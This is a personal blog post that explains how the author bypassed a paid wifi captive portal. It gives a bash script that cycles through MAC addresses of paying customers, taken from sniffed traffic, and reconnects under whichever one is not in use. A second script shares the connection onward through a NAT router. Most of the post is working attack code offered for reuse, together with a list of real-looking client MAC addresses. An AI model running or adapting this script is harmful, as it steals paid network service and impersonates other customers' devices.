Dec 252014
 

Synopsis

Getting free wifi from an open network that takes you to a “pay to use page”.

History

I am living for a time being on a site that has a wifi service that you pay to use. Having my own Sat connection meant that I did not need it in the beginning. But seeing as I used up my 10 gig allowance in 10 days and the connection goes to usable crap speed, I decided to have a look at the site wifi. Finding the login page wasn’t SSL then I originally though it would be a case of leaving a Kali laptop running airodump on till it captured a password. I did so but seeing as I had a load of captured http traffic I thought that MAC address spoofing may get some results. It did! But by googling ‘mac address spoofing for free wifi‘ shows that I am by no means the first. This appears to be a very well known exploit. So what I am sharing here is a script that will come in of use in getting the free wifi

Requirements

  1. Kali Linux. A backtrack installation would be ok too.

Code (bash)

#!/bin/bash
#my mac a0:f3:c1:0e:b3:9c
#10.0.1.x
#C8:02:10:34:02:0A
#AC:A2:13:28:02:F6
#F4:1B:A1:A0:D3:4B
conn[0]=”00:0D:A3:11:1A:53″
conn[1]=”00:0F:04:B3:94:04″
conn[2]=”00:15:6D:DA:BC:66″
conn[3]=”00:15:AF:46:F1:15″
conn[4]=”00:16:6F:CA:CE:8A”
conn[5]=”00:1A:EF:36:A3:25″
conn[6]=”00:1A:EF:36:A7:41″
conn[7]=”00:E3:B2:23:0A:4F”
conn[8]=”24:A4:3C:AE:2E:EC”
conn[9]=”30:10:B3:06:63:4E”
conn[10]=”3C:E0:72:BC:F5:87″
conn[11]=”44:91:DB:23:4C:6F”
conn[12]=”64:70:02:57:19:1A”
conn[13]=”64:70:02:57:35:FB”
conn[14]=”68:48:98:4B:87:47″
conn[15]=”68:A3:C4:51:B9:B9″
conn[16]=”6C:B7:F4:78:19:FF”
conn[17]=”94:35:0A:EE:CB:C1″
conn[18]=”AC:A2:13:28:02:F6″
conn[19]=”C8:02:10:34:02:0A”
conn[20]=”CC:52:AF:12:21:17″
conn[21]=”F4:EC:38:8F:59:7C”
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do

test[$a]=false

done
conn[99]=false
last=99
while true
do

echo “Pinging…”
rm capture/ping.txt
ping -c 5 8.8.8.8 > capture/ping.txt
if grep “100% packet loss” capture/ping.txt || [ $(wc -c “capture/ping.txt” | cut -f 1 -d ‘ ‘) -eq 0 ]
then

if [ $last=99 ]
then

ifconfig wlan2 down
macchanger -p wlan2 > /dev/null
nmcli con up id Legal
echo “Scanning site”
nmap -vv –open -n -sn 10.0.0.0/24 > capture/ls1.txt
nmap -vv –open -n -sn 10.0.1.0/24 >> capture/ls1.txt

fi
found=false
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do

if ! grep -q ${conn[$a]} capture/ls1.txt && ! [ $last = $a ] && [ ${test[$a]} = false ]
then

echo “”
echo “${conn[$a]} ($a) is availiable”
echo “”
ifconfig wlan2 down
macchanger -m ${conn[$a]} wlan2
nmcli con up id Legal
found=true
last=$a
test[$a]=true
break

fi

done
if ! $found
then

echo “”
echo “** No account free !!”;
echo “”
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do

test[$a]=false
last=99
done

fi

else

sleep 25

fi

done

What do it do?

  1. It does an nmap (ping) scan of the site then checks if any predifined MAC address is not being used, changes the mac of wlan2 to that and connects
  2. It pings 8.8.8.8 every 30 seconds and if 5 of 5 packets are lost then it initiates a scan
  3. If all are in use or have been tried it cycles back to the start.

You will need to populate the initial list of mac addresses by doing a nmap yourself to your local subnet.

Why is this better than just spoofing a mac ?

If you just spoof a mac of an existing client I have got the net but it is very patchy. This is no doubt down to that mac address being associated to 2 different stations with the same IP. Finding a load of MAC addresses of ppl who have paid and then using them when they are not, has proven to be the best approach.

Building on this

I built the Kali linux laptop into a router with the following commands

#!/bin/bash
# Start
# Configure IP address for WLAN
sudo ifconfig eth0 192.168.1.100
# Start DHCP/DNS server
sudo service dnsmasq restart
# Enable NATiptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan2 -j MASQUERADE
iptables --append FORWARD --in-interface wlan2 -j ACCEPT
#torrent
#iptables -t nat -A PREROUTING -p tcp --dport 53781 -j DNAT --to-destination 192.168.1.99
#iptables -A FORWARD -s 192.168.1.99 -p tcp --dport 53781 -j ACCEPT
# Enable routing
sysctl net.ipv4.ip_forward=1
# Run access point daemon
# sudo hostapd /etc/hostapd.conf
nmap -vv --open -sn 10.0.0.0/24 -n -oN capture/scan.txt --append-output
nmap -vv --open -sn 10.0.1.0/24 -n -oN capture/scan.txt --append-output
ping 8.8.8.8

The above will share a wlan2 interface over eth0. There is code in there that, if uncommented share to a hosted network. If the code is horrible for some reason it’s as the last time I scripted anything under bash was around 6 years ago.

Share

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>